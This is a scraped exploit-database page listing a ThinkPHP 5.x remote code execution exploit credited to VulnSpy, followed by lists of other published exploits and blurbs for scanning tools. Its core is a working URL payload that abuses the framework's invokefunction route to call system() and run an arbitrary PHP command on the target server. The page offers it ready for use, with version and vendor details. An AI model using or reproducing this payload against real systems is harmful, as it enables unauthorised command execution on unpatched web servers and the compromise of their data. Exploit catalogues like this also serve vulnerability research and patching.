Menu

Search for hundreds of thousands of exploits

"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution"

Author

Exploit author

VulnSpy

Platform

Exploit platform

php

Release date

Exploit published date

2018-12-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-27 "OXID eShop 6.3.4 - 'sorting' SQL Injection" webapps php VulnSpy
2018-12-15 "phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read" webapps php VulnSpy
2018-12-11 "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution" webapps php VulnSpy
2018-08-29 "phpMyAdmin 4.7.x - Cross-Site Request Forgery" webapps php VulnSpy
2018-06-27 "WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion" webapps php VulnSpy
2018-06-22 "phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)" webapps php VulnSpy
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.